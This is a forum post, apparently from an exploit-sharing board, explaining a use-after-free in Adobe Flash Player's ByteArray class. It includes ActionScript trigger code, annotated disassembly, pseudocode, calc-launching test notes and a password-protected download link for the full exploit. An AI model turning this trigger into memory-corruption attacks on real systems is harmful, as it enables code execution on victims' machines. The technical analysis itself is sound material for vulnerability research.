Jump to content
Byte-ul

Adobe Flash Player Exploit - UAF in ByteArray class

By Byte-ul, in Exploituri

Recommended Posts

Byte-ul Newbie

Byte-ul

Posted
Posted

The use-after-free vulnerability exists inside the built-in ByteArray class

ByteArray - Adobe ActionScript® 3 (AS3 ) API Reference

Let's create a simple ByteArray object:

    var ba:ByteArray = new ByteArray();
    ba.length = 8;
    ba[1] = 1;

Now we can access ba[] items and write numeric byte values into ba[].

Also we are allowed to write objects into ByteArray. For example:

  var obj = new MyClass();
    ba[0] = obj;

AS3 will try to implicitly convert the MyClass object into numeric value by

calling the MyClass.valueOf() method. This method can be easily redefined

within the user's code:

    class MyClass
    {
        prototype.valueOf = function()
        {
            ba.length = 88; // reallocate ba[] storage
            return 0;       // return byte for ba[offset]
        }
    }

Let's see how that implicit conversion occurs inside the native code:

push esi
    mov  eax, [esp+8]                // the offset value from "ba[offset] = obj"
    push eax
    add  ecx, 0x18                   // ecx = this = "ba" object pointer
    call ByteArray.getStorage()      // gets ba[offset] storage pointer and
    mov  esi, eax                    // saves it in esi

    mov  ecx, [esp+0xC]              // "obj" pointer
    push ecx
    call AvmCore.toInteger()         // call MyClass.valueOf()
    add  esp,4
    mov  [esi], al                   // writes returned byte into array

    pop  esi
    ret  8

On high-level language this will look like:

   void ByteArray.setObjInternal(int offset, obj)
    {
        byte* dest = this.getStorage(offset);
        dest* = toInteger(obj);
    }

So the array storage pointer is saved in local variable, then AS3 valueOf() is

invoked from the native code and returned byte is written into destination

pointer at the end. If valueOf() changes the length of byte array (see above)

and reallocates its internal storage, then local destination pointer becomes

obsolete and further usage of that pointer can lead to UaF memory corruption.

Using this vulnerability, it's very easy to control what byte will be written

and at which offset this corruption will occur.

Affected: Adobe Flash Player 9 and higher

Testing:

Open the test "calc.htm" file in your browser and press the button.

on Windows:

Calc.exe should be popped on desktop IE.

Calc.exe should be run as a non-GUI child process in metro IE.

Payload returns 0 from CreateProcessA("calc.exe") inside Chrome/FF sandbox.

on OS X:

Calculator is launched in FF or standalone Flash Player projector.

Payload returns 1 from vfork() in Safari sandbox.

Download: Adobe exp 2.rar

Pass: 123456789

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...